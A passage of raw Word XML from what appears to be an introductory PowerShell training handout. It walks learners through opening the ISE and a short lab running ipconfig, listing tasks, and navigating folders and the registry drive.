        <w:t>Open the run dialogue command again and this time type “PowerShell ISE”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ISE environmen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t. In addition to the normal PowerShell Console the ISE gives us the ability to Debug our scripts, displays the script in color to help easily identify coding errors, shows us a list of commands we can use (more on this later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB9067" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00C65561" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keep the ISE up – this is where most of the lessons will run from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FA1A6" w14:textId="77777777" w:rsidR="00C65561" w:rsidRPr="00C65561" w:rsidRDefault="00C65561" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07B1A352" wp14:editId="44D34606">
            <wp:extent cx="5053495" cy="1836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5372" cy="1837433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB93C2B" w14:textId="77777777" w:rsidR="0003746C" w:rsidRDefault="0003746C" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0945EF74" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00AC77EE" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Practice @Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFE099" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00C65561" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you need to upgrade your PowerShell version visit the following site for steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255834E9" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00C65561" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F294A1" w14:textId="77777777" w:rsidR="005F684C" w:rsidRPr="00C65561" w:rsidRDefault="00C65561" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://msdn.microsoft.com/en-us/powershell/scripting/setup/installing-windows-powershell</w:t>
      </w:r>
      <w:r w:rsidR="00BD1772" w:rsidRPr="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3CB0FD" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="00DF4366"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r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B511B6">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Some Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EC535" w14:textId="77777777" w:rsidR="002A73BA" w:rsidRDefault="002A73BA" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C0604B" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="00B511B6" w:rsidRDefault="00302066" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B511B6">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3ACF26" w14:textId="77777777" w:rsidR="002A73BA" w:rsidRPr="00B511B6" w:rsidRDefault="002A73BA" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0729BD9A" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="003402C7" w:rsidRDefault="00020640" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to the ole’ school way of doing things? Well you’re in luck. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to run all (some to be more accurate) of the common Command window functions. These can be run directly from the prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B6A6D" w14:textId="77777777" w:rsidR="002A73BA" w:rsidRPr="00B511B6" w:rsidRDefault="002A73BA" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390EBB41" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="00B511B6" w:rsidRDefault="00302066" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B511B6">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532766C" w14:textId="77777777" w:rsidR="00C73078" w:rsidRPr="00B511B6" w:rsidRDefault="00C73078" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF5BD7C" w14:textId="77777777" w:rsidR="00C73078" w:rsidRPr="003402C7" w:rsidRDefault="003A12DF" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estimated completion </w:t>
      </w:r>
      <w:r w:rsidR="00020640" w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:w w:val="120"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>time: 5 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D733D5A" w14:textId="77777777" w:rsidR="003A12DF" w:rsidRPr="00B511B6" w:rsidRDefault="003A12DF" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6905708C" w14:textId="77777777" w:rsidR="00CA6024" w:rsidRPr="003402C7" w:rsidRDefault="00743983" w:rsidP="00F256E3">
      <w:r w:rsidRPr="003402C7">
        <w:t xml:space="preserve">In this lab, you will </w:t>
      </w:r>
      <w:r w:rsidR="00020640" w:rsidRPr="003402C7">
        <w:t>play around with running typical “Commands” from within PowerShell. The goal of this lab is to get you used to using PowerShell – even for more common tasks. This lab is meant to be performed along with the demonstration and is listed here for completeness and if you need extra time to do it later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB964F" w14:textId="77777777" w:rsidR="00C73078" w:rsidRPr="00B511B6" w:rsidRDefault="00C73078" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07821A50" w14:textId="77777777" w:rsidR="00020640" w:rsidRDefault="00020640" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253818B9" w14:textId="77777777" w:rsid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 xml:space="preserve"> Get your IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74194ABE"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owerShell ISE has two windows:  the script pane and the command window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09555D8D" w14:textId="77777777" w:rsidR="00020640" w:rsidRDefault="00020640" w:rsidP="00962E4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle4"/>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83227B9" wp14:editId="372AD25A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2170679</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2194533</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1351280" cy="275590"/>
                <wp:effectExtent l="0" t="0" r="2032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5590"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6123CD9C" w14:textId="77777777" w:rsidR="00176BD8" w:rsidRPr="00020640" w:rsidRDefault="00176BD8" w:rsidP="00F256E3">
                            <w:r>
                              <w:t>Console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227B9" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:170.9pt;margin-top:172.8pt;width:106.4pt;height:21.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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="6123CD9C" w14:textId="77777777" w:rsidR="00176BD8" w:rsidRPr="00020640" w:rsidRDefault="00176BD8" w:rsidP="00F256E3">
                      <w:r>
                        <w:t>Console Window</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>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D4A123" wp14:editId="78367867">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2209800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>951865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1311910" cy="27559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75590"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="00BBDED9" w14:textId="77777777" w:rsidR="00176BD8" w:rsidRPr="00020640" w:rsidRDefault="00176BD8" w:rsidP="00F256E3">
                            <w:r w:rsidRPr="00020640">
                              <w:t>The Script P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A123" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174pt;margin-top:74.95pt;width:103.3pt;height:2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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="00BBDED9" w14:textId="77777777" w:rsidR="00176BD8" w:rsidRPr="00020640" w:rsidRDefault="00176BD8" w:rsidP="00F256E3">
                      <w:r w:rsidRPr="00020640">
                        <w:t>The Script Pane</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB60C91" wp14:editId="4F0CF383">
            <wp:extent cx="4135898" cy="299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6434" cy="2998031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2ADE2" w14:textId="77777777" w:rsidR="00020640" w:rsidRDefault="00020640" w:rsidP="00962E4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0591C4"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he script pane allows users to build out a script before executing it. Basically allowing you to make sure everything looks good before you hit “RUN”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5DDCC"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he Console window where the interaction with PowerShell takes place. You can enter information in directly and have it execute or build a script in the script pane and see the results once you hit “RUN”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0AD3E4" w14:textId="3FBD5F48"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ince we are building anything elaborate yet, feel free to interact directly with the </w:t>
      </w:r>
      <w:r w:rsidR="002B7D9D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> window. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9DB84" w14:textId="2C9C2D45" w:rsidR="00020640" w:rsidRPr="00962E4A" w:rsidRDefault="00020640" w:rsidP="00962E4A">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using the </w:t>
      </w:r>
      <w:r w:rsidR="00AD209D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> window find your IP address – </w:t>
      </w:r>
      <w:r w:rsidR="00962E4A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">simply type </w:t>
      </w:r>
      <w:r w:rsidRPr="00962E4A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69270016" w14:textId="77777777" w:rsidR="00020640" w:rsidRP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w:t>
      </w:r>
      <w:r w:rsidRPr="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get your task list / scheduled tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183B417C" w14:textId="5EFD110A" w:rsidR="00020640" w:rsidRDefault="00020640" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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at command would you run from the “Command” window to get your task list? What about schedule tasks? Not sure try opening a command window</w:t>
      </w:r>
      <w:r w:rsidR="002B7D9D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Win +</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002B7D9D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">R  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B7D9D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002B7D9D">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and typing help. Then try the corresponding command in PowerShell. Did it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344BDE55" w14:textId="77777777" w:rsidR="00020640" w:rsidRP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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Getting tricky…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D23C4"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the CD command to navigate around a few folders. Yes, I know that really isn’t tricky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071FB94"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CD to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hklm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: What happened?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD53C0"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type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- see anything interesting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6312D7AC" w14:textId="77777777" w:rsidR="00020640" w:rsidRP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More on Registry access later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E8C30A" w14:textId="77777777" w:rsidR="00020640" w:rsidRPr="00020640" w:rsidRDefault="00020640" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508F4381" w14:textId="77777777" w:rsidR="006218D9" w:rsidRPr="00B511B6" w:rsidRDefault="006218D9" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231D82C8" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="00B511B6" w:rsidRDefault="00536425" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Practice @Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F011B" w14:textId="77777777" w:rsidR="00536425" w:rsidRPr="00CA4184" w:rsidRDefault="00020640" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
